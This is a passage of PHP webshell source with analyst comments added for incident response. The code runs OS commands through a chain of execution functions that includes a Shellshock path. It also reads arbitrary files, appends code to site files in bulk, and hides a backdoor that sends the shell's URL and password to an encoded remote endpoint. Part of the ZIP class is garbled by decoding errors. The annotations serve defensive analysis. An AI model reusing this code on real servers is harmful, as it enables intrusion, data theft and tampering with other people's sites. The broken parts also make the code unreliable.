				echo '<td class="toptd" style="width:130px;">  </td>'; 
 
				echo '<td class="toptd" style="width:70px;">  </td></tr>'; 
 
				$result = @mysql_query($query,$conn); 
 
				$k = 0; 
 
				while($table = mysql_fetch_row($result)) 
 
				{ 
 
					$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_')); 
 
					echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>'; 
 
					echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'">  </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;">  </a></td>'; 
 
					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n"; 
 
					$k++; 
 
				} 
 
				echo '</table>'; 
 
			} 
 
		} 
 
	} 
 
	else die('MYSQL,.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">'); 
 
	if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>'; 
 
break; 
 
 
 
	 
 
	default: html_main($path,$shellname); break; 
 
} 
 
css_foot(); 
 
 
 
/*---doing---*/ 
 
 
 
/**
 * Write $text to $file, opening it with fopen() mode $t.
 *
 * Returns true when a write succeeds and false when both attempts fail.
 *
 * Analyst note: every call is @-silenced, so a failed write leaves no PHP
 * warning behind. The chmod to 0666 on failure is a filesystem change worth
 * looking for during triage of a host where this script was found.
 */
function do_write($file,$t,$text) 
 
{ 
 
	$key = true; 
 
	$handle = @fopen($file,$t); 
 
	// A return of 0 or false from fwrite() is treated as failure.
	if(!@fwrite($handle,$text)) 
 
	{ 
 
		// Loosen permissions, then retry on the handle opened above
		// (the file is not reopened after the chmod).
		@chmod($file,0666); 
 
		$key = @fwrite($handle,$text) ? true : false; 
 
	} 
 
	@fclose($handle); 
 
	return $key; 
 
} 
 
 
 
/**
 * List the entries of directory $filepath as paths ("$filepath/$entry",
 * passed through str_path()), skipping "." and "..".
 *
 * Returns an array of path strings; it does not recurse.
 * NOTE(review): the loop condition is a truthiness test on the entry name,
 * so an entry literally named "0" would end the listing early.
 */
function do_show($filepath){ 
 
	$show = array(); 
 
	$dir = dir($filepath); 
 
	while($file = $dir->read()){ 
 
		if($file == '.' or $file == '..') continue; 
 
		$files = str_path($filepath.'/'.$file); 
 
		$show[] = $files; 
 
	} 
 
	$dir->close(); 
 
	return $show; 
 
} 
 
 
 
/**
 * Recursively delete directory $deldir and everything below it.
 *
 * Returns true when the whole tree was removed, false as soon as any
 * unlink()/rmdir() fails (entries already deleted stay deleted).
 *
 * Analyst note: each file and directory is chmod'ed to 0777 before removal
 * and all errors are suppressed. A partially deleted tree with unexpected
 * 0777 modes is consistent with this routine having been interrupted.
 */
function do_deltree($deldir){ 
 
	$showfile = do_show($deldir); 
 
	foreach($showfile as $del){ 
 
		if(is_dir($del)){  
 
			// Depth-first: empty the sub-directory before its parent.
			if(!do_deltree($del)) return false; 
 
		}elseif(!is_dir($del)){ 
 
			@chmod($del,0777); 
 
			if(!@unlink($del)) return false; 
 
		} 
 
	} 
 
	@chmod($deldir,0777); 
 
	if(!@rmdir($deldir)) return false; 
 
	return true; 
 
} 
 
 
 
/**
 * Run $query on MySQL link $conn and print every column of every row,
 * HTML-escaped, inside a <textarea>.
 *
 * Uses the legacy mysql_* API, which was removed in PHP 7, so this code path
 * only works on PHP 5-era hosts. Query errors are suppressed with @.
 * html_n() is defined elsewhere in the file.
 */
function do_showsql($query,$conn){ 
 
	$result = @mysql_query($query,$conn); 
 
	html_n('<br><br><textarea cols="70" rows="15">'); 
 
	while($row = @mysql_fetch_array($result)){ 
 
		for($i=0;$i < @mysql_num_fields($result);$i++){ 
 
			html_n(htmlspecialchars($row[$i])); 
 
		} 
 
	} 
 
	html_n('</textarea>'); 
 
} 
 
 
 
/**
 * Post-login hook: reports this script's location and password to a third
 * party unless the host looks local or has already been reported.
 *
 * $xiao == 1 emits a <script src='?login=geturl'> tag, so the report is
 * triggered by the operator's browser on the next request; any other value
 * calls geturl() directly on the server.
 *
 * Analyst note: this is a secondary backdoor inside the tool. Whoever
 * deployed the script also leaks its URL and password (the `postpass`
 * constant) to the endpoint hard-coded in geturl(). Treat the password and
 * the host as known to more than one party. Observable artifacts: cookies
 * named `serveru` and `serverp` (the password is stored in clear text in the
 * latter) and an outbound HTTP request from the web server shortly after a
 * login.
 */
function hmlogin($xiao=1){ 
 
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; 
 
$serverp = postpass; 
 
// Reporting is skipped when host+path contains "0.0", "192.168." or
// "localhost" at an offset greater than 0 (a match at offset 0 does not
// count because of the `> 0` test), or when both cookies already hold the
// current values.
if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}} 
 
} 
 
 
 
/**
 * Stream the file at path $fd to the client as an attachment, then exit.
 *
 * Analyst note: the dispatcher earlier in the file calls this with
 * $_GET['down'], so it is an arbitrary file read limited only by the web
 * server account's permissions. In access logs it appears as a GET carrying
 * a `down=` parameter with a filesystem path. The base name and extension
 * are copied into response headers without quoting or filtering.
 */
function do_down($fd){ 
 
	// msg() is defined later in the file and terminates the request.
	if(!@file_exists($fd)) msg(''); 
 
	$fileinfo = pathinfo($fd); 
 
	header('Content-type: application/x-'.$fileinfo['extension']); 
 
	header('Content-Disposition: attachment; filename='.$fileinfo['basename']); 
 
	header('Content-Length: '.filesize($fd)); 
 
	@readfile($fd); 
 
	exit; 
 
} 
 
 
 
/**
 * Send the in-memory string $filecode to the client as an attachment named
 * $file, then exit.
 *
 * The dispatcher earlier in the file uses this for the `pack` action, naming
 * the download "<HTTP_HOST>.tar.gz". $file is placed in the header unquoted.
 */
function do_download($filecode,$file){ 
 
	header("Content-type: application/unknown"); 
 
	header('Accept-Ranges: bytes'); 
 
	header("Content-length: ".strlen($filecode)); 
 
	header("Content-disposition: attachment; filename=".$file.";"); 
 
	echo $filecode; 
 
	exit; 
 
} 
 
 
 
/**
 * Byte-level heuristic that guesses whether $text is UTF-8.
 *
 * Returns false for input shorter than 3 bytes, 1 when no byte >= 0x80 was
 * seen after the first three bytes, 2 when well-placed continuation bytes
 * are at least as frequent as misplaced ones, and 0 otherwise.
 *
 * NOTE(review): $begin is only incremented while it is below 3, so it never
 * reaches 4 and both `$begin == 4 && $BOM` tests are dead code. The first
 * three bytes are skipped by the `continue` whether or not they form a BOM,
 * and $BOM ends up reflecting only the third byte.
 */
function TestUtf8($text) 
 
{if(strlen($text) < 3) return false; 
 
$lastch = 0; 
 
$begin = 0; 
 
$BOM = true; 
 
$BOMchs = array(0xEF, 0xBB, 0xBF); 
 
$good = 0; 
 
$bad = 0; 
 
$notAscii = 0; 
 
for($i=0; $i < strlen($text); $i++) 
 
{$ch = ord($text[$i]); 
 
if($begin < 3) 
 
{ $BOM = ($BOMchs[$begin]==$ch); 
 
$begin += 1; 
 
continue; } 
 
if($begin==4 && $BOM) break; 
 
if($ch >= 0x80 ) $notAscii++; 
 
// 10xxxxxx is a continuation byte: count it as good after a byte with both
// top bits set, and as bad after a plain ASCII byte.
if( ($ch&0xC0) == 0x80 ) 
 
{if( ($lastch&0xC0) == 0xC0 ) 
 
{$good += 1;} 
 
else if( ($lastch&0x80) == 0 ) 
 
{$bad += 1; }} 
 
// A byte with both top bits set that is not followed by a continuation byte.
else if( ($lastch&0xC0) == 0xC0 ) 
 
{$bad += 1;} 
 
$lastch = $ch;} 
 
if($begin == 4 && $BOM) 
 
{return 2;} 
 
else if($notAscii==0) 
 
{return 1;} 
 
else if ($good >= $bad ) 
 
{return 2;} 
 
else 
 
{return 0;}} 
 
 
 
/**
 * Normalise a path string: every backslash becomes a forward slash, then
 * one left-to-right pass replaces each "//" pair with a single "/".
 */
function File_Str($string)
{
	$forward = str_replace('\\', '/', $string);

	return str_replace('//', '/', $forward);
}
 
 
 
/**
 * Write $filecode to $filename, opening it with fopen() mode $filemode.
 *
 * Same logic as do_write() in this file: on a failed write the file is
 * chmod'ed to 0666 and the write is retried on the already-open handle.
 * Returns true on success, false when both attempts fail. All errors are
 * suppressed with @.
 */
function File_Write($filename,$filecode,$filemode) 
 
{ 
 
	$key = true; 
 
	$handle = @fopen($filename,$filemode); 
 
	if(!@fwrite($handle,$filecode)) 
 
	{ 
 
		@chmod($filename,0666); 
 
		$key = @fwrite($handle,$filecode) ? true : false; 
 
	} 
 
	@fclose($handle); 
 
	return $key; 
 
} 
 
 
 
/**
 * Run the OS command $cmd through the first execution primitive that is
 * available and return its output as a string.
 *
 * Order tried: exec, shell_exec, system, passthru, popen, COM WScript.shell,
 * proc_open, and finally a mail()-based path.
 *
 * Defender notes:
 *  - Most branches are gated on function_exists() and the chain falls
 *    through to the next primitive, so hardening via `disable_functions`
 *    only helps if it covers every entry here, including popen, proc_open,
 *    putenv and mail.
 *  - The last branch places a shell function definition in an environment
 *    variable named PHP_LOL before calling mail(). This is the Bash
 *    environment-variable import flaw widely known as Shellshock, and the
 *    code's own messages ("Not vuln (not bash)") confirm the intent. A
 *    patched bash makes the branch inert.
 *  - Host artifacts: shell or cmd child processes of the web server worker,
 *    files created by tempnam(".", "data") in the script's working
 *    directory, and the PHP_LOL environment variable.
 */
function Exec_Run($cmd) 
 
{ 
 
	$res = ''; 
 
	if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} 
 
	elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} 
 
	elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} 
 
	elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} 
 
	elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} 
 
	// Taken only when the script path does not start with "/" and the COM
	// class exists, i.e. a Windows-style host.
	elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();} 
 
	// NOTE(review): $aliases is never defined in this function, so the alias
	// lookup is a no-op here. Unlike the other branches, this one
	// HTML-escapes the output.
	elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);} 
 
	// NOTE(review): the recipient literal reads "[email protected]" on this
	// page; that looks like the hosting site's e-mail obfuscation rather
	// than the original value. $tmp is unset when /bin/sh is not bash.
	elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("[email protected]","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";} 
 
	return $res; 
 
} 
 
 
 
/**
 * Derive a base directory by removing the directory part of
 * $_SERVER['PHP_SELF'] from the end of realpath('./'), then normalising the
 * slashes with File_Str().
 *
 * NOTE(review): presumably meant to approximate the document root. The
 * subtraction is by string length only, so the result is only meaningful
 * when the working directory actually ends with the URL path.
 */
function File_Mode() 
 
{ 
 
	$RealPath = realpath('./'); 
 
	$SelfPath = $_SERVER['PHP_SELF']; 
 
	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); 
 
	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); 
 
} 
 
 
 
/**
 * Return the owner account name of path $File on hosts where
 * PATH_SEPARATOR is ':' (POSIX-style). On other hosts nothing is returned.
 *
 * NOTE(review): when posix_getpwuid() is unavailable, $File is still the
 * path string and the `['name']` lookup is applied to that string.
 */
function GetFileOwner($File) { 
 
		if(PATH_SEPARATOR==':'){ 
 
			if(function_exists('posix_getpwuid')) { 
 
			// $File is reused: from here on it holds the passwd record array.
			$File = posix_getpwuid(fileowner($File)); 
 
			} 
 
			return $File['name']; 
 
		} 
 
} 
 
 
 
/**
 * Return the owning group name of path $File on hosts where
 * PATH_SEPARATOR is ':' (POSIX-style). On other hosts nothing is returned.
 *
 * NOTE(review): when posix_getgrgid() is unavailable, $File is still the
 * path string and the `['name']` lookup is applied to that string.
 */
function GetFileGroup($File) { 
 
		if(PATH_SEPARATOR==':'){ 
 
            if(function_exists('posix_getgrgid')) { 
 
			// $File is reused: from here on it holds the group record array.
			$File = posix_getgrgid(filegroup($File)); 
 
			} 
 
			return $File['name']; 
 
		} 
 
} 
 
 
 
/**
 * Format a byte count for display.
 *
 * Values below 1024 are returned unchanged with a " B" suffix. Larger values
 * are divided by the matching power of 1024, rounded to two decimals and
 * suffixed " K", " M", " G" or " T" (everything from 1024^4 up uses " T").
 */
function File_Size($size)
{
	$step = 1024;

	if ($size < $step) {
		return $size." B";
	}

	$suffixes = array(" K", " M", " G", " T");
	$lastIndex = count($suffixes) - 1;
	$divisor = $step;

	foreach ($suffixes as $index => $suffix) {
		// Stop at the first unit whose upper bound exceeds $size; the last
		// unit has no upper bound.
		if ($index === $lastIndex || $size < $divisor * $step) {
			return round($size / $divisor, 2).$suffix;
		}
		$divisor = $divisor * $step;
	}
}
 
 
 
/**
 * Read the whole of $filename in binary mode and return its contents.
 *
 * All errors are suppressed with @, so an unreadable or missing file yields
 * whatever fread() returns on an invalid handle rather than a warning.
 */
function File_Read($filename) 
 
{ 
 
	$handle = @fopen($filename,"rb"); 
 
	$filecode = @fread($handle,@filesize($filename)); 
 
	@fclose($handle); 
 
	return $filecode; 
 
} 
 
 
 
/**
 * Convert a string, or the keys and values of an array, to encoding
 * $output (default 'utf-8'), after guessing the source encoding from a
 * fixed candidate list.
 *
 * NOTE(review): mb_detect_encoding() is called on $data before the
 * is_array() check, and the scalar branch inside the loop converts $data
 * (the whole array) instead of $val. Converted keys are added next to the
 * original keys, which are not removed.
 */
function array_iconv($data,  $output = 'utf-8') {   
 
    $encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');   
 
    $encoded = mb_detect_encoding($data, $encode_arr);   
 
   
 
    if (!is_array($data)) {   
 
        return mb_convert_encoding($data, $output, $encoded);   
 
    }   
 
    else {   
 
        foreach ($data as $key=>$val) {   
 
            $key = array_iconv($key, $output);   
 
            if(is_array($val)) {   
 
                $data[$key] = array_iconv($val, $output);   
 
            } else {   
 
            $data[$key] = mb_convert_encoding($data, $output, $encoded);   
 
            }   
 
        }   
 
    return $data;   
 
    }   
 
} 
 
 
 
// Report a php.ini setting for display: "No" when get_cfg_var() compares
// loosely equal to 0, "Yes" when it compares loosely equal to 1, otherwise
// the raw value. This is part of the tool's host reconnaissance output.
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}} 
 
// Report "Yes" or "No" depending on whether function $funName exists.
// The tool uses this to show which PHP capabilities the host exposes.
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";} 
 
 
 
/**
 * Run OS command $cmd through the execution primitive named by $fun
 * ("exec", "shell_exec", "system", "passthru" or "popen") and return the
 * output. Any other $fun returns an empty string.
 *
 * Defender note: unlike Exec_Run(), the caller picks the primitive, so one
 * function missing from `disable_functions` is enough for this to work.
 * All errors are suppressed with @.
 */
function do_phpfun($cmd,$fun) { 
 
	$res = ''; 
 
	switch($fun){ 
 
		case "exec": @exec($cmd,$res); $res = join("\n",$res); break; 
 
		case "shell_exec": $res = @shell_exec($cmd); break; 
 
		case "system": @ob_start();	@system($cmd); $res = @ob_get_contents();	@ob_end_clean();break; 
 
		case "passthru": @ob_start();	@passthru($cmd); $res = @ob_get_contents();	@ob_end_clean();break; 
 
		case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))	$res .= @fread($f,1024);} @pclose($f);break; 
 
	} 
 
	return $res; 
 
} 
 
 
 
// Request-time counterpart of geturl(): builds the same report (this
// script's host+path and the `postpass` password) and sends it with
// GetHtml().
// NOTE(review): isset() returns a boolean, and a boolean compared loosely
// with the non-empty string 'geturl' is true whenever the parameter is
// present, so any `login=` value triggers this block.
// Analyst note: the base64 literal decodes to a URL-encoded plain-HTTP
// endpoint, hxxp://api[.]fwqadmin[.]com/api.php?u= (defanged). The password
// therefore leaves the host in clear text in a query string. Look for that
// hostname in proxy and DNS logs.
if(isset($_GET['login'])=='geturl'){ 
 
    @set_time_limit(10); 
 
	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; 
 
    $serverp = postpass; 
 
    $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA'); 
 
    $url=$copyurl.$serveru.'&passwd='.$serverp; 
 
    $url=urldecode($url); 
 
    GetHtml($url); 
 
} 
 
 
 
/**
 * Send this script's host+path and its password (`postpass`) to a
 * hard-coded remote endpoint via GetHtml().
 *
 * Analyst note: this is the reporting half of the secondary backdoor that
 * hmlogin() triggers. The base64 literal decodes to a URL-encoded
 * plain-HTTP endpoint, hxxp://api[.]fwqadmin[.]com/api.php?u= (defanged),
 * and the password is appended as `&passwd=`. Useful indicators are that
 * hostname in DNS or proxy logs and outbound port-80 traffic from the web
 * server using the fixed MSIE 6.0 User-Agent set in GetHtml().
 */
function geturl(){ 
 
    @set_time_limit(10); 
 
	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; 
 
    $serverp = postpass; 
 
    $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA'); 
 
    $url=$copyurl.$serveru.'&passwd='.$serverp; 
 
    $url=urldecode($url); 
 
GetHtml($url); 
 
} 
 
 
 
/**
 * Walk directory $dir (recursing into sub-directories when $bool is true)
 * and apply the bulk operation named by $type to every file except the
 * script itself ($shell).
 *
 * Operations, as implemented below:
 *   "guama"    - append "\n".$code to each file whose path matches one of
 *                the '|'-separated fragments in $filetype (see debug()).
 *   "qingma"   - remove every occurrence of $code from files containing it.
 *   "tihuan"   - replace $code with $filetype in files containing it.
 *   "scanfile" - list files whose base name contains $code.
 *   "scancode" - list files whose content contains $code.
 *   "scanphp"  - list files with extension $code whose content matches the
 *                signature list in muma().
 *
 * Incident-response note: "guama" and "tihuan" rewrite site files in bulk.
 * When this script is found on a host, assume other files in the tree may
 * have been modified and compare them against a known-good copy, since
 * appended content can sit after the legitimate end of a file.
 *
 * NOTE(review): in this decoded copy both arms of each success/failure
 * ternary print the same text; presumably the original labels were lost in
 * decoding. Detection uses stristr() (case-insensitive), while the
 * replacement uses str_replace() (case-sensitive).
 */
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ 
 
	$show = do_show($dir); 
 
	foreach($show as $files){ 
 
		if(is_dir($files) && $bool){ 
 
			do_passreturn($files,$code,$type,$bool,$filetype,$shell); 
 
		}else{ 
 
			// Never touch the script's own file.
			if($files == $shell) continue; 
 
			switch($type){ 
 
				case "guama": 
 
				if(debug($files,$filetype)){ 
 
					do_write($files,"ab","\n".$code) ? html_n("--> $files<br>") : html_n("--> $files<br>"); 
 
				} 
 
				break; 
 
				case "qingma": 
 
				$filecode = @file_get_contents($files); 
 
				if(stristr($filecode,$code)){ 
 
$newcode = str_replace($code,'',$filecode); 
 
					do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>"); 
 
				} 
 
				break; 
 
				case "tihuan": 
 
				$filecode = @file_get_contents($files); 
 
				if(stristr($filecode,$code)){ 
 
					$newcode = str_replace($code,$filetype,$filecode); 
 
					do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>"); 
 
				} 
 
				break; 
 
				case "scanfile": 
 
				$file = explode('/',$files); 
 
				if(stristr($file[count($file)-1],$code)){ 
 
					html_a("?eanver=editr&p=$files",$files); 
 
					echo '<br>'; 
 
				} 
 
				break; 
 
				case "scancode": 
 
				$filecode = @file_get_contents($files); 
 
				if(stristr($filecode,$code)){ 
 
					html_a("?eanver=editr&p=$files",$files); 
 
					echo '<br>'; 
 
				} 
 
				break; 
 
				case "scanphp": 
 
				$fileinfo = pathinfo($files); 
 
				if($fileinfo['extension'] == $code){ 
 
					$filecode = @file_get_contents($files); 
 
					if(muma($filecode,$code)){ 
 
						html_a("?eanver=editr&p=".urlencode($files),""); 
 
						html_a("?eanver=del&p=".urlencode($files),""); 
 
						echo $files.'<br>'; 
 
					} 
 
				} 
 
				break; 
 
			} 
 
		} 
 
	} 
 
} 
 
 
 
 
 
/**
 * Minimal ZIP archive writer that streams entries to a file handle.
 *
 * Usage implied by the methods: startfile() opens the output, addfile() and
 * adddir() append entries while accumulating central-directory records in
 * memory, and createfile() writes the directory and end record and closes
 * the handle.
 *
 * Analyst notes:
 *  - In this tool the class supports packing server-side files for bulk
 *    download, so an unexpected archive in a web-writable directory is a
 *    staging indicator.
 *  - addfile() calls eval() on a string built from hex digits it generated
 *    itself (not from request data). It is still an `eval(` occurrence that
 *    generic scanners will flag.
 *  - adddir() is damaged in this decoded copy: the bare "ERROR!" line and
 *    the line breaks inside two string literals are decoder artifacts, so
 *    the method is not valid PHP as shown.
 */
class PHPzip{ 
 
 
 
	// Number of entries written so far.
	var $file_count = 0 ; 
 
	// Bytes of entry data written so far (offset of the next local header).
	var $datastr_len   = 0; 
 
	// Total length of the accumulated central-directory records.
	var $dirstr_len = 0; 
 
	var $filedata = ''; 
 
	// Output archive path, set by startfile().
	var $gzfilename; 
 
	// Output file handle, set by startfile().
	var $fp; 
 
	// Accumulated central-directory records, written by createfile().
	var $dirstr=''; 
 
 
 
    /**
     * Pack a Unix timestamp (default: now) into the 32-bit DOS date/time
     * layout. Dates before 1980 are clamped to 1980-01-01 00:00:00.
     */
    function unix2DosTime($unixtime = 0) { 
 
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); 
 
 
 
        if ($timearray['year'] < 1980) { 
 
        	$timearray['year']    = 1980; 
 
        	$timearray['mon']     = 1; 
 
        	$timearray['mday']    = 1; 
 
        	$timearray['hours']   = 0; 
 
        	$timearray['minutes'] = 0; 
 
        	$timearray['seconds'] = 0; 
 
        } 
 
 
 
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | 
 
               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
 
    } 
 
 
 
	/**
	 * Create any missing parent directories of $path and open $path for
	 * writing. Returns true when the file was opened, false otherwise.
	 */
	function startfile($path = "web.zip"){ 
 
		$this->gzfilename=$path; 
 
		$mypathdir=array(); 
 
		// Collect ancestors from nearest to farthest until dirname() yields '.'.
		do{ 
 
			$mypathdir[] = $path = dirname($path); 
 
		}while($path != '.'); 
 
		@end($mypathdir); 
 
		// Walk the list backwards so outer directories are created first.
		do{ 
 
			$path = @current($mypathdir); 
 
			@mkdir($path); 
 
		}while(@prev($mypathdir)); 
 
 
 
		if($this->fp=@fopen($this->gzfilename,"w")){ 
 
			return true; 
 
		} 
 
		return false; 
 
	} 
 
 
 
    /**
     * Append one file entry named $name with contents $data. A name ending
     * in "/" is delegated to adddir().
     */
    function addfile($data, $name){ 
 
        $name     = str_replace('\\', '/', $name); 
 
		 
 
		if(strrchr($name,'/')=='/') return $this->adddir($name); 
 
		 
 
        // Turn the DOS timestamp into four little-endian bytes by building a
        // "\xNN" escape string and evaluating it. The input is hex digits
        // produced by dechex() above, not request data.
        $dtime    = dechex($this->unix2DosTime()); 
 
        $hexdtime = '\x' . $dtime[6] . $dtime[7] 
 
                  . '\x' . $dtime[4] . $dtime[5] 
 
                  . '\x' . $dtime[2] . $dtime[3] 
 
                  . '\x' . $dtime[0] . $dtime[1]; 
 
        eval('$hexdtime = "' . $hexdtime . '";'); 
 
 
 
        $unc_len = strlen($data); 
 
        $crc     = crc32($data); 
 
        $zdata   = gzcompress($data); 
 
        // NOTE(review): the length is taken before the 2 leading and 4
        // trailing bytes are stripped on the next line.
        $c_len   = strlen($zdata); 
 
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
 
		 
 
        // Local file header, the data, then a trailing crc/size triplet.
        $datastr  = "PK\x03\x04"; 
 
        $datastr .= "\x14\x00";  
 
        $datastr .= "\x00\x00"; 
 
        $datastr .= "\x08\x00";  
 
        $datastr .= $hexdtime;  
 
        $datastr .= pack('V', $crc); 
 
        $datastr .= pack('V', $c_len); 
 
        $datastr .= pack('V', $unc_len); 
 
        $datastr .= pack('v', strlen($name)); 
 
        $datastr .= pack('v', 0);  
 
        $datastr .= $name; 
 
        $datastr .= $zdata; 
 
        $datastr .= pack('V', $crc);  
 
        $datastr .= pack('V', $c_len); 
 
        $datastr .= pack('V', $unc_len); 
 
 
 
 
 
		fwrite($this->fp,$datastr); 
 
		$my_datastr_len = strlen($datastr); 
 
		unset($datastr); 
 
		 
 
        // Matching central-directory record, kept in memory until createfile().
        $dirstr  = "PK\x01\x02"; 
 
        $dirstr .= "\x00\x00";  
 
        $dirstr .= "\x14\x00"; 
 
        $dirstr .= "\x00\x00"; 
 
        $dirstr .= "\x08\x00"; 
 
        $dirstr .= $hexdtime; 
 
        $dirstr .= pack('V', $crc);  
 
        $dirstr .= pack('V', $c_len);  
 
        $dirstr .= pack('V', $unc_len);  
 
        $dirstr .= pack('v', strlen($name) );  
 
        $dirstr .= pack('v', 0 );   
 
        $dirstr .= pack('v', 0 );    
 
        $dirstr .= pack('v', 0 );    
 
        $dirstr .= pack('v', 0 );     
 
        $dirstr .= pack('V', 32 );    
 
        $dirstr .= pack('V',$this->datastr_len );  
 
        $dirstr .= $name; 
 
		 
 
		$this->dirstr .= $dirstr; 
 
		 
 
		$this -> file_count ++; 
 
		$this -> dirstr_len += strlen($dirstr); 
 
		$this -> datastr_len += $my_datastr_len;	 
 
    } 
 
 
 
	/**
	 * Append a directory entry named $name (no data, all sizes zero).
	 * The body below is damaged by the decoder; see the class comment.
	 */
	function adddir($name){  
 
		$name = str_replace("\\", "/", $name);  
ERROR! 
$datastr = "PK\x03\x04
\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
 
		 
 
		$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );  
 
		$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);  
 
 
 
		fwrite($this->fp,$datastr);	 
 
		$my_datastr_len = strlen($datastr); 
 
		unset($datastr); 
 
		 
 
		$dirstr = "PK\x01\x02\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
 
		$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );  
 
		$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );  
 
		$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;  
 
		 
 
		$this->dirstr .= $dirstr; 
 
 
 
		$this -> file_count ++; 
 
		$this -> dirstr_len += strlen($dirstr); 
 
		$this -> datastr_len += $my_datastr_len;	 
 
	} 
 
 
 
 
 
	/**
	 * Write the accumulated central directory followed by the
	 * end-of-central-directory record, then close the output handle.
	 */
	function createfile(){ 
 
		$endstr = "PK\x05\x06\x00\x00\x00\x00" . 
 
					pack('v', $this -> file_count) . 
 
					pack('v', $this -> file_count) . 
 
					pack('V', $this -> dirstr_len) . 
 
					pack('V', $this -> datastr_len) . 
 
					"\x00\x00"; 
 
 
 
		fwrite($this->fp,$this->dirstr.$endstr); 
 
		fclose($this->fp); 
 
	} 
 
 } 
 
 
 
 
 
/**
 * Extract the ZIP archive at $tmp_name into directory $todir (default
 * 'zipfile') and print navigation links. $new_name is accepted but unused.
 *
 * Analyst note: the dispatcher earlier in the file passes $_GET['unzip']
 * and $_GET['todir'] straight in, so both the archive path and the
 * destination are chosen by the requester. This lets many files be placed
 * on the host in one request; a burst of new files sharing one timestamp
 * under a web-writable directory is the trace to look for.
 *
 * NOTE(review): a failed open() only echoes an empty string. Execution
 * continues to extractTo() and close() on the unopened archive.
 */
function start_unzip($tmp_name,$new_name,$todir='zipfile'){ 
 
$zip = new ZipArchive() ; 
 
if ($zip->open($tmp_name) !== TRUE) { 
 
echo ''; 
 
} 
 
$zip->extractTo($todir); 
 
$zip->close(); 
 
echo '&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path='.urlencode($todir).'"></a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);"></a>'; 
 
} 
 
 
 
/**
 * Crude signature check: returns true when $filecode contains (ignoring
 * case) any marker string listed for $filetype ("php", "asp", "aspx" or
 * "jsp"). Nothing is returned when no marker matches.
 *
 * Analyst note: do_passreturn() uses this in its "scanphp" mode to list
 * other script files on the host that look like backdoors. The marker list
 * is plain substring matching and also matches much legitimate code, so it
 * is not a usable detection rule on its own.
 *
